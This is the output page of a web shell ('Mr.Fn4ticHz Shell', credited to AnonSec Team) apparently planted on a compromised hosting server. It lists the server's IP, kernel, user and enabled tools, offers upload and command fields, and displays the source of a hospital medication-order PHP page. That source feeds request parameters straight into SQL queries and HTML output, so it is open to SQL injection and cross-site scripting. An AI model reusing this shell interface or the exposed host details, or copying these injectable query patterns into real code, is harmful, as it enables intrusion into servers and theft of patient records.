Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.219.249.210
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/Medication_order_timline1.php
<!DOCTYPE html>
<html>  <head>
    
  
  </head>
  <body>
    <title>In House Patient</title>
 
  <body>
      
           	<h3><i class="fa fa-angle-right"></i> Medication Order</h3>
          	<style>
    form{
        margin: 20px 0;
    }
    form input, button{
        padding: 5px;
    }
    table{
        width: 100%;
        margin-bottom: 20px;
		border-collapse: collapse;
    }
    table, th, td{
        border: 1px solid #cdcdcd;
    }
    table th, table td{
        padding: 10px;
        text-align: left;
    }
	<style>
           
			table{
    border: solid 1px gray;
    width: 100%;
  }
  
  
  </style>
  </head>
  <?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../patientmanager.php');



if(isset($_POST['CreateReturn'])) 
{ 
$sql ="UPDATE `medicine_inventory` SET `totalQuatity`='$_POST[AddQty]' WHERE inventory_id='$_GET[inventory_id]'";
if($qsql = mysqli_query($con,$sql))
		{
    echo "<script>alert('Successfully');</script>";
    echo "<script>window.open('Medication_order.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]'); </script>";
  } else {
    echo "Sorry, there was an error uploading your file.";
  } 
    
}



?>
<input type="search" class="light-table-filter" data-table="order-table" placeholder="Search">
    <div id="container">
 <table border="1" class="order-table">
      <tbody>
                  <tr>
          <th>Date – time </th>
          <th>Medication Details</th>
            
          <th colspan='2'>Action</th>
         </tr>
        </tbody>
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
 $sql6 ="SELECT * FROM medicinede WHERE Action_med='Disperse'  AND prescriptionid='$_GET[prescriptionid]' OR Action_med='Refuse'  AND prescriptionid='$_GET[prescriptionid]'  ";
		$qsql6 = mysqli_query($con,$sql6);
		while($re1 = mysqli_fetch_array($qsql6))
		{
	$sql1 ="SELECT * FROM site_users WHERE userno='$re1[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
		    
		     $x=$re1[durationselect]; $y=$re1[duration]; $w=$re1[Frequency]; 
		  $a=$x*$y;
		  $b=$a*$w;
		   if (is_numeric($re1[DRUGS]))
{
		  $sql ="SELECT * FROM medicine_stok WHERE medicine_id='$re1[DRUGS]'";
$qsql = mysqli_query($con,$sql);
$re2 = mysqli_fetch_array($qsql);
echo"";
echo"";

		     echo " <tbody>
            <tr>
     <td><b>Created at:</b> $re1[created_at]
                 <br><b>Created By:</b> $re[name] </td>
                 <td><b>Name :</b> $re2[DRUGS_name] ($re2[Category]) 
                 <br>";
                 echo"<b>Duration : </b> $re1[duration]  ";
                 
	   
switch ($re1[durationselect]) {
  case '1':
    echo "Days";
    break;
      case '7':
    echo "Week";
    break;
case '28':
    echo "Month";
    break;

        default:
    
}

$sql ="SELECT * FROM medicine_stok WHERE medicine_id='$re1[DRUGS]'";
$qsql = mysqli_query($con,$sql);
$re2 = mysqli_fetch_array($qsql);
echo"";
echo"";

    
$slot ="SELECT * FROM `medicine_slot` where prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND medicine_id='$re2[medicine_id]'";
$qslot = mysqli_query($con,$slot);
$rslot = mysqli_fetch_array($qslot); 

 
 $batchName=$con->query("SELECT * FROM medicine_inventory WHERE medicine_id='$rslot[medicine_id]' AND Batch_number='$rslot[batchno]'");
$RowBatchNumber=$batchName->fetch_assoc();

    echo " <br>	<b>	Batch No :</b> $RowBatchNumber[Batch_number]";
  echo " <br>	<b>	Quantity Sold :</b> $rslot[quantitygiven] <br>	";
  
 $sqlpatient2 = "SELECT * FROM  medicine_slot WHERE prescriptionid='$_GET[prescriptionid]' AND  srno='$rslot[srno]' AND  action='Paid'";
	$qsqlpatient2 = mysqli_query($con,$sqlpatient2);
 if($rsn2 = mysqli_fetch_array($qsqlpatient2)){

	       $sqlpatient21 = "SELECT * FROM  medicine_inventory WHERE   Batch_number='$rsn2[batchno]'";
	$qsqlpatient21 = mysqli_query($con,$sqlpatient21);
 if($rsn21 = mysqli_fetch_array($qsqlpatient21)){

 $disGST=$rsn2[pricetotal]/100;
                $GSTfinal=$disGST*$rsn21[gst]; 
                $GRANDTOTAL=$rsn2[pricetotal];
                
                
     echo " <b>Grand Total</b>  :<i class='fa fa-inr'></i> $GRANDTOTAL";
 }}               

    
    
            echo "</td>";
            
            
$sql12="SELECT  * FROM medicine_inventory WHERE medicine_id='$re2[medicine_id]' OR inventory_id='$_GET[inventory_id]'";
            $result = $con->query($sql12);
$row = mysqli_fetch_array($result);
  
  $sql2 ="SELECT * FROM medicine_stok WHERE medicine_id='$re2[medicine_id]'";
$qsql2 = mysqli_query($con,$sql2);
$rs2 = mysqli_fetch_array($qsql2);

    $sql3 ="SELECT * FROM medicine_slot WHERE medicine_id='$rs2[medicine_id]'";
$qsql3 = mysqli_query($con,$sql3);
$rs3 = mysqli_fetch_array($qsql3);


    $z=$rs2['size']*$row['SUM(Quantity)'];
    $a=$z-$rs3['quantitygiven'];
   
    
    
  
 
 

 
                echo" 
              
	<td>
	<br><br>
	<a class='btn btn-warning' href='add_medicine_qty.php?inventory_id=$RowBatchNumber[inventory_id]&prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&medicine_id=$re2[medicine_id]&Batch_number=$RowBatchNumber[Batch_number]'>Create Return</a><br><br>
</td>
    </tr>   
    
                 
          
   
   	";	
		}
		}
		}
		?>

   <table id="example2"  id ="demo" class="table table-bordered table-hover">
<?php
			$sql ="SELECT * FROM addaspatient WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
            echo " <tbody>
                    
          
     ";
}
?>  
   </tbody>
</table> 
            <script>
      let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>
    <script>
 function drugload(drid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divdr").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loaddrug.php?drid="+drid,true);
        xmlhttp.send();
}
            
  
</script>

  </body>
</html>
</div>
<?php


	

 $sql12="SELECT  * FROM medicine_inventory";
            $result = $con->query($sql12);
while($row = mysqli_fetch_array($result)){
   
  $sql2 ="SELECT * FROM medicine_stok WHERE medicine_id='$row[medicine_id]'";
$qsql2 = mysqli_query($con,$sql2);
while($rs2 = mysqli_fetch_array($qsql2))
{
    

?>
<script>
      function reSum<?php echo $rs2['medicine_id'] ?>()
        {
            var num1 = parseInt(document.getElementById("Num1<?php echo $rs2['medicine_id'] ?>").value);
            var num2 = parseInt(document.getElementById("Num2<?php echo $rs2['medicine_id'] ?>").value);
            document.getElementById("Sum<?php echo $rs2['medicine_id'] ?>").value = num1 + num2;

        }
</script>
<?php }} ?>

Anon7 - 2022
AnonSec Team